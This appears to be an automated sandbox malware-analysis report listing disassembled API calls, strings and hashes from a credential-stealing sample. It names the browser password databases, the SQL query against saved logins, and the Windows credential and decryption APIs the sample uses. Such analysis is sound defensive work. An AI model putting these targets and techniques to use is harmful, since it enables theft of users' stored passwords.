                                                                                                                                                                        • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                        • API String ID: 3536422406-1740548384
                                                                                                                                                                        • Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                        • Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
                                                                                                                                                                        • Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
                                                                                                                                                                        • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
                                                                                                                                                                        • wcslen.MSVCRT ref: 004093F3
                                                                                                                                                                        • wcslen.MSVCRT ref: 004093FB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindwcslen$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2163959949-0
                                                                                                                                                                        • Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                        • Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
                                                                                                                                                                        • Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                        • Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004141FE
                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0041420E
                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00414219
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                                        • Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                        • Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
                                                                                                                                                                        • Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                        • Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
                                                                                                                                                                          • Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
                                                                                                                                                                          • Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2
                                                                                                                                                                          • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
                                                                                                                                                                        • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1355100292-0
                                                                                                                                                                        • Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                        • Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004182A7
                                                                                                                                                                        • GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystemmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3558857096-0
                                                                                                                                                                        • Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                        • Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
                                                                                                                                                                        • Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                        • Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
APIs
• memset.MSVCRT ref: 00411EC2
• wcsrchr.MSVCRT ref: 00411EDB
• memset.MSVCRT ref: 0041202F
  • Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
  • Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29
  • Part of subcall function 0040956D: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
  • Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
  • Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
  • Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
  • Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A
  • Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
  • Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
  • Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D
  • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
  • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
  • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
  • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
  • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
  • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082
• memset.MSVCRT ref: 0041204B
• memset.MSVCRT ref: 00412061
• memset.MSVCRT ref: 0041207D
• wcslen.MSVCRT ref: 004120C4
• wcslen.MSVCRT ref: 004120D1
• ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
• memset.MSVCRT ref: 0041217E
  • Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
  • Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
  • Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
  • Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
  • Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
  • Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
  • Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB
• memset.MSVCRT ref: 00412241
• memset.MSVCRT ref: 0041225B
• wcslen.MSVCRT ref: 00412275
• wcslen.MSVCRT ref: 00412283
• memset.MSVCRT ref: 004122FD
• memset.MSVCRT ref: 00412317
• wcslen.MSVCRT ref: 00412331
• wcslen.MSVCRT ref: 0041233F
• memset.MSVCRT ref: 004123C2
• memset.MSVCRT ref: 004123E0
• memset.MSVCRT ref: 004123FE
• memset.MSVCRT ref: 00412573
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
  • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
  • Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
• wcslen.MSVCRT ref: 0041245B
• wcslen.MSVCRT ref: 00412469
• wcslen.MSVCRT ref: 004124AF
• wcslen.MSVCRT ref: 004124BD
• wcslen.MSVCRT ref: 00412503
• wcslen.MSVCRT ref: 00412511
• _wcsicmp.MSVCRT ref: 004125DA
  • Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
  • Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
  • Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
  • Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
  • Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
• String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
• API String ID: 2195781745-1743926287
• Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
• Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
• Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
• Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
  • Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
  • Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
  • Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
• GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
• EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 0040FFA1
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
• Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
• Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
• Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph: edge list for the function at 409cb0-409eb4 (rendered as an interactive graph on the original page; raw edge list omitted)
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                          • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 00409E9F
                                                                                                                                                                          • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                        • memset.MSVCRT ref: 00409D85
                                                                                                                                                                          • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                          • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                        • wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409E0C
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409E27
• memcpy.MSVCRT ref: 00409E42
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
• Instruction ID: 4efc6fce7ce7295637414d4ef923d95a635c1e3a2e0485d2030de31f1e6ccd1f
• Opcode Fuzzy Hash: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
• Instruction Fuzzy Hash: 4051FE71D40209ABEB50EFA5DC45B9EB7B8AF54304F15403BB504B72D2EB78AD048B98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 004029C4
• CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
• CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
• memset.MSVCRT ref: 00402A20
• DeleteFileW.KERNEL32(?), ref: 00402C96
  • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
  • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
  • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
• memset.MSVCRT ref: 00402A95
  • Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E
  • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
  • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
  • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
• memset.MSVCRT ref: 00402BF7
• memcpy.MSVCRT ref: 00402C0A
• MultiByteToWideChar.KERNEL32 ref: 00402C31
• LocalFree.KERNEL32(?), ref: 00402C3A
Strings
• chp, xrefs: 004029E6
• SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
• String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
• API String ID: 1340729801-1844170479
• Opcode ID: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
• Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
• Opcode Fuzzy Hash: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
• Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
  • Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
  • Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
  • Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
  • Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
  • Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
• OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
• GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
• DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
  • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
  • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
  • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
  • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
• CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
• WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
• UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
• FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
• CloseHandle.KERNEL32(?), ref: 00409B48
• CloseHandle.KERNEL32(00000000), ref: 00409B4D
• CloseHandle.KERNEL32(00000000), ref: 00409B52
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
• API String ID: 327780389-4002013007
• Opcode ID: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
• Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
• Opcode Fuzzy Hash: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
• Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 00410D59
• memset.MSVCRT ref: 00410D6E
• memset.MSVCRT ref: 00410D83
• memset.MSVCRT ref: 00410D98
• memset.MSVCRT ref: 00410DAD
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
  • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
  • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
• wcslen.MSVCRT ref: 00410DD3
• wcslen.MSVCRT ref: 00410DE4
• wcslen.MSVCRT ref: 00410E1C
• wcslen.MSVCRT ref: 00410E2A
• wcslen.MSVCRT ref: 00410E63
• wcslen.MSVCRT ref: 00410E71
• memset.MSVCRT ref: 00410EF7
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 2775653040-2068335096
• Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
• Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
• Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
• Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 00410F6A
• memset.MSVCRT ref: 00410F7F
• memset.MSVCRT ref: 00410F94
• memset.MSVCRT ref: 00410FA9
• memset.MSVCRT ref: 00410FBE
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
  • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
  • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
• wcslen.MSVCRT ref: 00410FE4
• wcslen.MSVCRT ref: 00410FF5
• wcslen.MSVCRT ref: 0041102D
• wcslen.MSVCRT ref: 0041103B
• wcslen.MSVCRT ref: 00411074
• wcslen.MSVCRT ref: 00411082
• memset.MSVCRT ref: 00411108
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 2775653040-3369679110
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2238633743-70141382
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
  • Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
  • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
  • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
  • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
  • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
• wcslen.MSVCRT ref: 004095CC
• wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
• memset.MSVCRT ref: 00409679
• memcpy.MSVCRT ref: 0040969A
• _wcsnicmp.MSVCRT ref: 004096DF
• wcschr.MSVCRT ref: 00409707
• LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID: J$Microsoft_WinInet$Microsoft_WinInet_
• API String ID: 1313344744-1864008983
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040A444
